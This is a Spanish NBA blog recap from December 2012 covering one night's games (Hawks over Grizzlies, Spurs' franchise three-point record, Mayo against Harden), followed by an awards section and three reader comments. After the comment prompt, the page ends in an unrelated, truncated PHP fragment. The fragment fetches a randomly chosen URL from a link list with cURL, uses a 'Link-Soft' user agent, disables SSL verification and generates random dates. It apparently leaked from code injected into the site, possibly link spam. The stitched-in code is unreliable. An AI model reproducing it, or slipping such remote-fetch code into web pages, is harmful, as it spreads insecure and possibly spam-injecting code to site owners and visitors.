La Crónica: Cambio de jefe en el Oeste

09 de December de 2012 por Sancho88

Anoche vivimos la caída de la hegemonía ‘Grizzlie’ en el Oeste. De un plumazo han bajado hasta la tercera posición al perder contra los enrachadísimos Hawks (9-1 en los últimos 10 partidos), por un claro (93-83). El FedEx Forum vivió la debacle en el tercer cuarto, donde pasaron de un +8 a favor (41-49) a un -13 al final del periodo (73-60), que marcó las diferencias hasta el final. ¿El culpable? Uno de los mejores sextos hombres de la pasada temporada, y que este año también lo está haciendo de lujo como suplente de Jeff Teague; nada más y nada menos que Lou Williams. Con el marcador más o menos igualado, fue autor de 13 puntos consecutivos (con tres triples seguidos incluidos)  en los últimos 4 minutos del tercer periodo. Los Grizzlies sufrieron en sus carnes la racha de un tirador de pura raza, y si no que se lo digan a los Lakers, a los que ya les ganó el año pasado un partido muy parecido con los Sixers, pero esta vez en el último cuarto.

Lógicamente, ‘Lou’ fue uno de los mejores de su equipo con 21 puntos, aunque Josh Smith y Al Horford también hicieron de las suyas; Smith aprovechando una variación táctica de Larry Drew, que lo colocó como 3 de salida dejando a Stevenson en el banco y dando entrada a Pachulia como titular al lado de Horford. Este movimento fue muy efectivo, y Smith le ganó a su par Rudy Gay un duelo de grandes aleros. 24 puntos y 8 rebotes fueron su tarjeta de presentación anoche en Memphis, mientras que Horford tampoco se amilanó ante su par Zach Randolph y firmó un doble-doble (19-14). Si al triunvirato unimos los pésimos porcentajes en tiros libres de los Grizzlies (61%), y las 16 pérdidas de equipo capitaneadas por Mike Conley (que perdió 6 él solito) comprendemos la derrota de Memphis. Randolph fue el mejor con 18 puntos y 13 rebotes, Marc cumplió (18-8-5) pero Rudy Gay estuvo muy mal con el porcentaje de tiros de campo (7/25), Conley fatal en la dirección y nadie ayudó esta vez desde el banquillo.

A Rey muerto, Rey puesto. Y eso es lo que pasó anoche. Los Spurs sacaron el rodillo en casa de los Bobcats (132-102) y ya son líderes del Oeste. Además, anotaron 19 triples, lo que supone un nuevo record de la franquicia, anteriormente en 17. Fue Danny Green el pistolero. El alero formado en ‘La Fábrica de churros’ de North Carolina sacó su fusil (últimamente muy atascado), y afinó muchísimo desde lejos. 7/9 para él y partido decidido en la primera mitad. Tony Parker también jugó a un gran nivel en la primera mitad, yéndose hasta los 22 puntos y 9 asistencias con un impecable 10/12 en TC, incluído un triple. Ya en el segundo tiempo, Popovich dio oportunidad a los secundarios, comandados por Nando de Colo. Obviamente, como ya explicamos el otro día, era incomprensible verlo en la liga de desarrollo. Es uno de los mejores talentos en Europa en el puesto de base, y ayer lo demostró: 10 puntos, 8 rebotes y 6 asistencias. Splitter y Mills también aportaron 10 y 13 puntos respectivamente. En los Bobcats Kemba Walker volvió a ser el mejor con 23 puntos, pero debe empezar a buscar a sus compañeros. No puede basar todo su juego en la anotación, y muchas veces se embala buscando su canasta sin ver absolutamente nada más. Dunlap anoche hizo una cosa extraña, sentó a la pareja titular MullensHaywood y dio entrada a dos jugadores sin gran impacto este año, como son Biyombo y Diop. El resultado fue obviamente desastroso: Diop apenas jugó y no metió ni una, y Biyombo metió 4 puntos y 8 rebotes en más de media hora. Ese no es el camino Dunlap. Tendrá que aprender la lección para próximas ediciones.

Quienes también se despistaron anoche fueron los Knicks, que cedieron una noche más sin Carmelo Anthony ante los Bulls de Marco ‘Silvester’ Belinelli (85-93). El escolta italiano promedia 20 puntos en los últimos tres partidos (curiosamente tres victorias consecutivas para Chicago), y con él en la pista los Bulls no están echando en falta la baja de R.I.P. Hamilton. Anoche metió 22 puntos, los mismos que Luol Deng, y entre los dos blindaron el United Center frente al líder del Este. Noah y Boozer se fueron hasta el doble-doble, y Nate Robinson salió desde el banquillo para remplazar a Hinrich y ya se quedó todo el partido; 14 puntos, 6 rebotes y 8 asistencias fueron sus números. Con estos gregarios de lujo, el equipo saldrá muy reforzado cuando lleguen Rose y Hamilton. Los desenamorados de Thibodeau y de los Bulls tras el ridículo en Playoffs del año pasado deben ir reenganchándose otra vez, porque van a dar que hablar esta temporada. En los Knicks una vez más el mejor fue Raymond Felton con 27 puntos, (eso sí, se tiró hasta las zapatillas: 9/30 en TC), y Tyson Chandler luchó contra Noah y ganó el duelo individual, con 14 puntos y 18 rebotes que no le valieron a su equipo para conseguir la victoria.

Los Heat no quieren perder comba en la lucha por la ventaja de campo en las finales de Conferencia, y anoche completaron un ejercicio de redención tras dos derrotas consecutivas contra los Wizards y los Knicks, su gran rival esta temporada. La víctima propiciatoria fueron los Hornets, que se llevaron una buena paliza (90-106). Entre Lebron y Wade anotaron 50 puntos, Bosh ayudó con otros 13 y Battier y Ray Allen pusieron su granito de arena desde el banquillo con 11 unidades cada uno. En los Hornets Robin López arregló su pésimo partido del viernes con 20 puntos y 8 rebotes, y formó una buena pareja interior junto a Ryan Anderson, quien sin duda está siendo el mejor jugador del equipo tras la lesión de Anthony Davis. Anoche anotó 24 puntos el ala-pívot sacramentino.

En Boston los Celtics se vengaron de los Sixers en el back-to-back tras el partido del viernes (79-92). Rajon Rondo volvió a acariciar el triple-doble (7-9-11) y Kevin Garnett lideró la ofensiva de los ‘orgullosos’ con 19 puntos y 9/11 en tiros de campo. Paul Pierce no estuvo nada mal (13 puntos y 9 asistencias) y el banquillo volvió a aportar grandes cosas de la mano (como no) de Jeff Green, quien anotó 16 puntos, y del rookie Jared Sullinger, que ayer estuvo cerca del doble-doble y acabó con 7 puntos y 9 rebotes. En Philadelphia Thaddeus Young se quedó muy solo con sus 22 puntos, ya que Evan Turner y Jrue Holiday estuvieron bastante discretos.

En L.A. hay dos caras de la moneda totalmente opuestas. Por un lado, los deprimentes Lakers, que han perdido 6 de sus últimos 10 partidos, y, por otro lado, los enrachados Clippers, que llevan 5 victorias consecutivas con un Blake Griffin totalmente imparable y un Chris Paul que empieza a despertar de su letargo. En la tarde angelina los Suns se llevaron un serio correctivo (99-117) con una batería de pequeños por parte de los Clippers sensacional. Entre Paul, Crawford y Bledsoe anotaron 47 puntos, y, como bien apuntó Denise en la crónica de ayer, Odom empieza a aportar. Anoche metió 8 puntos y cogió 8 rebotes, empieza a entrar en la dinámica del equipo, y puede ser un factor desequilibrante, como lo era Reggie Evans el año pasado. Incluso, con más motivo, ya que Odom puede anotar fácilmente si se lo propone. Además, Chris Paul movió bien la bola y dio 11 pases de canasta, Matt Barnes estuvo muy bien desde el banquillo (13-8), pero el mejor jugador de la noche fue sin duda Blake Griffin. El ala-pívot anotó 24 puntos, aunque estuvo mal desde los tiros libres, pero cogío 8 rebotes, dio 4 asistencias y robó 4 balones. Este fue el talón de aquiles de Phoenix en el partido de ayer. Acumularon 20 pérdidas y de nada valió el buen partido de Michael Beasley anotando 21 puntos desde el banquillo. Scola tampoco fue titular, pero también firmó buenos números (19-10, con 8/11 en TC) y Shannon Brown se fue hasta los 19 puntos saliendo en el quinteto. Pero una vez más, Gortat estuvo horrible, y demuestra día a día que se quiere ir de los Suns, como ya declaró, y que es un tipo muy limitado cuando no tiene a un genio que lo alimente. Gentry tiene mucho trabajo con este equipo. Sin Nash no son nada.

En el resto de la jornada, los Mavericks se llevaron el duelo texano contra los Rockets (116-109) en la noche en la que volvía Kevin McHale al banquillo tras el fallecimiento de su hija. O.J. Mayo le recibió no precisamente con los brazos abiertos, destrozando a los Rockets con 40 puntos (15/26 en TC) y 8 rebotes en un duelo apasionante contra el otro ‘bicho’ del equipo rival: James Harden. ‘The Beard’ rozó el triple-doble con 39 puntos, 6 rebotes y 9 asistencias, estuvo genial desde la línea de tiros libres pero no fue suficiente para parar al talentoso escolta de los Mavericks, entre otras cosas, porque Kaman hizo uno de esos partidos que suele hacer una vez cada ‘x’ tiempo (20 puntos, 7 rebotes), y Darren Collison y Vince Carter ayudaron desde el banquillo. Harden, sin embargo, solo se vio respaldado por Chandler Parsons (18-10-5) y un poco por Toney Douglas desde la segunda unidad, pero Omer Asik volvió a jugar fatal, Jeremy Lin más de lo mismo y los Rockets se deshinchan a marchas forzadas. No obstante, Jones y Motiejunas lo vieron todo desde el banquillo, para no variar.

En Washington, los Warriors tuvieron que emplearse a fondo para llevarse una apretada victoria (101-97) en la capital de EE.UU. El trío la-la-la (LeeCurryThompson) hizo una vez de las suyas y entre los tres se despacharon con 69 puntos. Es maravilloso verles circular la bola, ver a Lee jugando dentro-fuera con suma facilidad, ya que los tres son grandes amenazas desde el arco, pero también jugando hacia dentro. Lee, además de los 24 puntos, sumó 17 rebotes y está haciendo un temporadón, demostrando de sobra que vale lo que pone en su contrato y que, si está motivado, es uno de los jugadores más desequilibrantes poste alto-poste bajo de toda la liga. No es un tipo con mucho carisma, pero tiene calidad para aburrir. Además, Landry y Green volvieron a ayudar desde el banquillo. Las ganas que le echa Draymond son increíbles. Ese es el espíritu que les falta a 200 jugadores o más que seguramente son mejores que él en la liga, pero Green se empieza a labrar un nombre jugando con una intensidad buenísima. No obstante, los Wizards estuvieron a punto de remontar. Jordan Crawford y Bradley Beal anotaron sendos triples, y al final el rookie pudo prolongar el partido 5 minutos más; los Wizards perdían de 2, falló a propósito un tiro libre, cogío su propio rebote y pudo haber forzado la prórroga con una fácil bandeja. Pero los duendes de la fortuna no le acompañaron. No obstante, es de alabar que no se rindan a pesar del record tan negativo (2-15). Crawford con 22 puntos lideró la ofensiva, y Beal aportó 17 puntos, 6 rebotes y 6 asistencias. Ha jugado un gran fin de semana, pero los Wizards no encuentran la regularidad.

Y, finalmente, entre dos duelos de perdedores, Detroit venció en Cleveland (104-97) con un Brandon Knight soberbio (30-7-5), que le ganó un bonito duelo individual a Jeremy Pargo, autor de 24 puntos. Varejao volvió a su doble-doble habitual (16-13); y Sacramento venció su primer partido fuera de casa contra los Blazers (99-80), y ya van tres victorias consecutivas, liderados una noche más por Cousins (19-12), y por dos protagonistas nada esperados ante la ausencia de Tyreke Evans: John Salmons, que acabó con un doble-doble (19 puntos y 11 asistencias), acorde a su salario pero no por ello esperado, y 11 puntos de un jugador que seguro que pocos recordáis: Travis Outlaw. Algunos jugadores como este se quieren vengar de equipos donde lo han hecho bien, y anoche fue su turno. No obstante, se echará a dormir la siesta otros cuatro años. Por hoy ya fue suficiente, pensará el alero seguramente. Lo de Salmons, en realidad, no es tan sorprendente para los seguidores de los Kings. Es un alero extraño, con altura de escolta pero que dirige como un base, de ahí sus 11 asistencias. De hecho, este año está ejerciendo como capitán, y junto a Francisco García están liderando al equipo en los últimos juegos poniendo la dosis necesaria de veteranía. Bien por ellos.

PREMIOS

MVP: Lo de O.J. Mayo en Houston fue tan escandaloso, que tan solo tenemos ojitos para él esta mañana. 40 puntos, 8 rebotes, 3 asistencias, 2 robos de balón y 15/26 en tiros de campo. Soberbio e impecable. Si Kaman sigue jugando a un nivel similar y Dirk vuelve como él sabe, ojito con los Mavs. Por el momento no conviene enterrarlos.

Rookie: Bradley Beal se lleva el premio con 17 puntos, 6 rebotes y 6 asistencias. No logró dar la victoria a los Wizards, pero tiene pinta de que lo volverá a intentar. Su progesión es ascendente y hoy le damos este premio para que se motive. Nando de Colo cuajó una gran actuación contra los Bobcats, con 10 puntos, 8 rebotes y 6 asistencias; Jared Sullinger aportó desde el banquillo de los Celtics, con 7 puntos y 9 rebotes;  Tyler Zeller estuvo bien con 13 puntos y 8 rebotes en la derrota de los Cavs; Damian Lillard estuvo discreto (para lo que nos tiene acostumbrados) en la derrota de los Blazers, con 12 puntos y 9 asistencias; Michael Kidd-Gilchrist se pegó un costalazo en la rabadilla al final del segundo cuarto, pero pudo acabar el partido, con unos dignos 8 puntos, 5 rebotes, 6 asistencias y 3 tapones; y, por último, Draymond Green nos sigue encantando con sus 6 puntos y 8 rebotes de ayer, pero con toneladas de ilusión y energía.

Sorpresa: Tenemos a Salmons con 19 puntos y 11 asistencias, y tenemos el 7/9 en triples y 23 puntos de Danny Green con los Spurs. Ambas cosas no suelen suceder, aunque nos quedamos con Brandon Knight, que nos dejó uno de sus mejores partidos en la NBA. Con 30 puntos, 7 rebotes y 5 asistencias se convirtió en una pesadilla para la defensa de los Cavs y por eso se lleva el premio de hoy a la mayor sorpresa. Outlaw con esos 11 puntos es como si Kobe Bryant anotara 60, y también nos ha sorprendido; igual que el 8-8 de Lamar Odom, por quien también derrochamos hoy lágrimas de felicidad.

Decepción: Omer Asik vuelve a ganar otra noche más. 6 puntos, 7 rebotes, 4 pérdidas de balón. No sabemos qué hacer para que McHale ponga a Motiejunas de una vez. A ver si lee el blog o algo. Jeremy Lin también estuvo fatal (7-2-3) y ya no nos creemos su cuento de la cenicienta; y, por último, a Marcin Gortat no le importará si le ponemos en decepción por aquí. Quiere forzar el traspaso y lo está logrando. Anoche 6 puntazos y 3 rebotes, impresionante decepción. Y sí, es a propósito lo de Okafor; 2 puntos en 11 minutos, pero en él ya no es tan decepcionante, sino la tónica general. Así que ni nos molestamos.

Esfuerzo en vano: Obviamente, en el gran duelo de pistoleros del Oeste, James Harden perdió, y por ello se leva el ‘MEV’ de esta mañana como premio menor. 39 puntos, 6 rebotes y 9 asistencias para él, aunque, eso sí, perdió 6 veces el balón. 10/17 en tiros de campo y 15/16 en tiros libres. Partidazo exento de victoria.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    No sé si la gente está de puente, de examenes, o que…

    Buena crónica Sancho, yo a falta de comentarios me la he leído tres veces. Lo de los Hawks es increíble, vaya temporadón hasta ahora. La pintura es cosa suya con Pachulia, Horford y Smith, Teague ha dado un gran paso adelante (habrá que verlo en play-offs) y Louis Williams está en su papel, muy acertado. Un alero les echo en falta, pero bueno… veremos de qué son capaz en play-offs

      Citar

  2. Santi dice:
    #2

    Pues comentemos. Buena crónica como siempre

      Citar

  3. nba dice:
    #3

    No se que pasa con los rookies de Houston, pero estoy seguro que en Lakers los recibiriamos con los brazos abiertos, que hay que rejuvenecer la plantilla, no estaria mal un trade de Jones+Donatas por Jordan Hill, ya que parece que D’antoni le tiene ojeriza a este, pues seria un buen destino para suplir a Asik cuando no tiene el dia

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>